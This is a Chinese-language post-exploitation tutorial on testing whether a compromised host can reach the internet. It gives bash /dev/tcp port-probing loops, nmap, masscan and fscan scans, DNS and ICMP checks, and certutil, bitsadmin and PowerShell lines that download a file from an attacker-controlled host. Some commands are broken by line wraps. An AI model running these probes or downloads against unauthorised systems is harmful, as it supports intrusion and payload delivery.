在實戰中難免會遇到各種各樣的情況，其中對于目標主機是否出網這是一個十分值得收集的信息，因為完全不出網你就獲取不到主機了

端口

Linux 系統

對于 Linux 系統，探測其允許出網的端口，這里使用的是 Linux 的自帶命令，所以
適用于每個 Linux 版本。

for i in {440..449};do timeout 0.5 bash -c "echo >/dev/tcp/baidu.com/$i" && e
cho "$i ************************open************************" || echo "$i clos
ed";done

也可以將結果寫入文件中

for i in {440..449};do timeout 0.5 bash -c "echo >/dev/tcp/baidu.com/$i" && e
cho "$i ************************open************************"|| echo "$i close
d";done >> result.txt

探測常見端口

for i in {21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,33
89,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};do timeout 0.5 bash -c "echo >/dev/tcp/baidu.com/$i" && echo "$i ************************open****
********************" || echo "$i closed";done

nmap 探測命令
nmap -sT -Pn -p- -v www.baidu.com
masscan 探測命令
masscan -p 80,443,8000-9000 182.61.200.6 --rate=10000
fscan 探測命令
fscan -h 182.61.200.6 -p 1-65535

Windows 系統

對于 Windows 系統，可以直接使用端口探測的程序進行探測即可。比如御劍掃描
器、nmap、IISPutScaner、PortScan 等。如果能 RDP 遠程上去，可以使用圖形
化工具，如果只是 Webshell，可以使用命令行工具即可！
探測的端口范圍
可以根據 nmap 的端口范圍探測。也可以根據自己的經驗積累的端口范圍進行探
測。

nmap -n --top-ports 100 127.0.0.1 -oA foo > /dev/null
grep -i "services\=" foo.xml | sed -r 's/.*services\=\"(.*)(\"\/>)/\1/g'

協議

探測 ICMP 協議

服務端監聽 ICMP 流量：tcpdump icmp
客戶端ping VPS 地址，查看服務端能否收到請求
我們 VPS 監聽，然后 ping 我們 vps 查看能否收到監聽來判斷 ICMP 協議是否出
網。也可以直接 ping 一個地址，看是否有 ttl 值。

探測 DNS 協議

Windows：nslookup、ping
Linux：nslookup、dig、ping
通過判斷能否將域名解析為 ip，判斷 DNS 協議是否出網。也可以將域名換成
dnslog 的域名，再看 dnslog 能否收到請求

探測 HTTP 協議

Linux 系統可以使用 curl 命令：
curl http://192.168.10.13
Windows 系統可以使用以下命令：

certutil -urlcache -split -f http://192.168.10.13/1
bitsadmin /transfer test http://192.168.10.13/1 c:\1
powershell iwr -Uri http://192.168.10.13/1 -OutFile 1 -UseBasicParsing